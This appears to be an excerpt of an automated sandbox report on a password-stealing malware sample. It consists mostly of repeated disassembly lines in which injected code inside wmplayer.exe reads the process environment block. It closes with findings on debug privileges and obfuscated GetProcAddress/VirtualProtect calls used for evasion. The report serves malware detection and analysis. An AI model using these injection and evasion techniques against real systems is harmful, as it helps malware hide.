            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F50E4 mov ecx, dword ptr fs:[00000030h]6_2_032F50E4
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CA0E3 mov ecx, dword ptr fs:[00000030h]6_2_032CA0E3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CC0F0 mov eax, dword ptr fs:[00000030h]6_2_032CC0F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A50D9 mov eax, dword ptr fs:[00000030h]6_2_033A50D9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033520DE mov eax, dword ptr fs:[00000030h]6_2_033520DE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov ecx, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C0 mov eax, dword ptr fs:[00000030h]6_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F90DB mov eax, dword ptr fs:[00000030h]6_2_032F90DB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D0C0 mov eax, dword ptr fs:[00000030h]6_2_0334D0C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D0C0 mov eax, dword ptr fs:[00000030h]6_2_0334D0C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334C730 mov eax, dword ptr fs:[00000030h]6_2_0334C730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03305734 mov eax, dword ptr fs:[00000030h]6_2_03305734
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB73C mov eax, dword ptr fs:[00000030h]6_2_033AB73C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov eax, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov ecx, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330273C mov eax, dword ptr fs:[00000030h]6_2_0330273C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D3720 mov eax, dword ptr fs:[00000030h]6_2_032D3720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EF720 mov eax, dword ptr fs:[00000030h]6_2_032EF720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C720 mov eax, dword ptr fs:[00000030h]6_2_0330C720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C720 mov eax, dword ptr fs:[00000030h]6_2_0330C720
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339972B mov eax, dword ptr fs:[00000030h]6_2_0339972B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0338F72E mov eax, dword ptr fs:[00000030h] | 6_2_0338F72E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D973A mov eax, dword ptr fs:[00000030h] | 6_2_032D973A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D973A mov eax, dword ptr fs:[00000030h] | 6_2_032D973A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032C9730 mov eax, dword ptr fs:[00000030h] | 6_2_032C9730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032C9730 mov eax, dword ptr fs:[00000030h] | 6_2_032C9730
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03300710 mov eax, dword ptr fs:[00000030h] | 6_2_03300710
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D7703 mov eax, dword ptr fs:[00000030h] | 6_2_032D7703
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D5702 mov eax, dword ptr fs:[00000030h] | 6_2_032D5702
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D5702 mov eax, dword ptr fs:[00000030h] | 6_2_032D5702
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330F71F mov eax, dword ptr fs:[00000030h] | 6_2_0330F71F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330F71F mov eax, dword ptr fs:[00000030h] | 6_2_0330F71F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330C700 mov eax, dword ptr fs:[00000030h] | 6_2_0330C700
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D0710 mov eax, dword ptr fs:[00000030h] | 6_2_032D0710
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h] | 6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h] | 6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h] | 6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CB765 mov eax, dword ptr fs:[00000030h] | 6_2_032CB765
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D8770 mov eax, dword ptr fs:[00000030h] | 6_2_032D8770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E0770 mov eax, dword ptr fs:[00000030h] | 6_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03354755 mov eax, dword ptr fs:[00000030h] | 6_2_03354755
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03312750 mov eax, dword ptr fs:[00000030h] | 6_2_03312750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03312750 mov eax, dword ptr fs:[00000030h] | 6_2_03312750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h] | 6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h] | 6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h] | 6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033A3749 mov eax, dword ptr fs:[00000030h] | 6_2_033A3749
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D0750 mov eax, dword ptr fs:[00000030h] | 6_2_032D0750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330674D mov esi, dword ptr fs:[00000030h] | 6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330674D mov eax, dword ptr fs:[00000030h] | 6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330674D mov eax, dword ptr fs:[00000030h] | 6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D07AF mov eax, dword ptr fs:[00000030h] | 6_2_032D07AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033A37B6 mov eax, dword ptr fs:[00000030h] | 6_2_033A37B6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h] | 6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h] | 6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h] | 6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h] | 6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h] | 6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h] | 6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033597A9 mov eax, dword ptr fs:[00000030h] | 6_2_033597A9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032FD7B0 mov eax, dword ptr fs:[00000030h] | 6_2_032FD7B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0338F78A mov eax, dword ptr fs:[00000030h] | 6_2_0338F78A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h] | 6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h] | 6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h] | 6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DD7E0 mov ecx, dword ptr fs:[00000030h] | 6_2_032DD7E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D47FB mov eax, dword ptr fs:[00000030h] | 6_2_032D47FB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D47FB mov eax, dword ptr fs:[00000030h] | 6_2_032D47FB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DC7C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DC7C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h] | 6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h] | 6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h] | 6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033507C3 mov eax, dword ptr fs:[00000030h] | 6_2_033507C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D262C mov eax, dword ptr fs:[00000030h] | 6_2_032D262C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032EE627 mov eax, dword ptr fs:[00000030h] | 6_2_032EE627
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h] | 6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033A5636 mov eax, dword ptr fs:[00000030h] | 6_2_033A5636
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03306620 mov eax, dword ptr fs:[00000030h] | 6_2_03306620
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03308620 mov eax, dword ptr fs:[00000030h] | 6_2_03308620
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032E260B mov eax, dword ptr fs:[00000030h] | 6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03312619 mov eax, dword ptr fs:[00000030h] | 6_2_03312619
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330F603 mov eax, dword ptr fs:[00000030h] | 6_2_0330F603
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03301607 mov eax, dword ptr fs:[00000030h] | 6_2_03301607
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D3616 mov eax, dword ptr fs:[00000030h] | 6_2_032D3616
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D3616 mov eax, dword ptr fs:[00000030h] | 6_2_032D3616
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0334E609 mov eax, dword ptr fs:[00000030h] | 6_2_0334E609
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03302674 mov eax, dword ptr fs:[00000030h] | 6_2_03302674
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330A660 mov eax, dword ptr fs:[00000030h] | 6_2_0330A660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330A660 mov eax, dword ptr fs:[00000030h] | 6_2_0330A660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03309660 mov eax, dword ptr fs:[00000030h] | 6_2_03309660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_03309660 mov eax, dword ptr fs:[00000030h] | 6_2_03309660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0339866E mov eax, dword ptr fs:[00000030h] | 6_2_0339866E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0339866E mov eax, dword ptr fs:[00000030h] | 6_2_0339866E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032EC640 mov eax, dword ptr fs:[00000030h] | 6_2_032EC640
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033066B0 mov eax, dword ptr fs:[00000030h] | 6_2_033066B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CD6AA mov eax, dword ptr fs:[00000030h] | 6_2_032CD6AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032CD6AA mov eax, dword ptr fs:[00000030h] | 6_2_032CD6AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0330C6A6 mov eax, dword ptr fs:[00000030h] | 6_2_0330C6A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h] | 6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h] | 6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h] | 6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335368C mov eax, dword ptr fs:[00000030h] | 6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335368C mov eax, dword ptr fs:[00000030h] | 6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335368C mov eax, dword ptr fs:[00000030h] | 6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0335368C mov eax, dword ptr fs:[00000030h] | 6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D4690 mov eax, dword ptr fs:[00000030h] | 6_2_032D4690
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032D4690 mov eax, dword ptr fs:[00000030h] | 6_2_032D4690
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033506F1 mov eax, dword ptr fs:[00000030h] | 6_2_033506F1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033506F1 mov eax, dword ptr fs:[00000030h] | 6_2_033506F1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h] | 6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h] | 6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h] | 6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h] | 6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_0338D6F0 mov eax, dword ptr fs:[00000030h] | 6_2_0338D6F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032FD6E0 mov eax, dword ptr fs:[00000030h] | 6_2_032FD6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032FD6E0 mov eax, dword ptr fs:[00000030h] | 6_2_032FD6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033636EE mov eax, dword ptr fs:[00000030h] | 6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033036EF mov eax, dword ptr fs:[00000030h] | 6_2_033036EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h] | 6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: 6_2_033916CC mov eax, dword ptr fs:[00000030h] | 6_2_033916CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: GetProcAddress(_EE20_0E7E_0670_EE4C_ECB5_EE6F_EEC3_08F8_0658_FE75_EC8D_EE0E_EED3_EE29_061F_EE20_0609_0670_EC98, _EED7_EE62_EED2_EED2_EE36_06E7_08D4_EE79_0EA6_EEDD_08C8_EECC_EEDB_EEBC_0E79_EEFA_0658_EEAB)
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)_EEB7_0E67_EC93_EEA7_0650_08E9_EEDC_EC7A_066B_ECBE_EEFC_08F7_EE31_EE92_0653_08EC.Length, 64u, out var _EC93_065B_EE29_08EE_06E7)
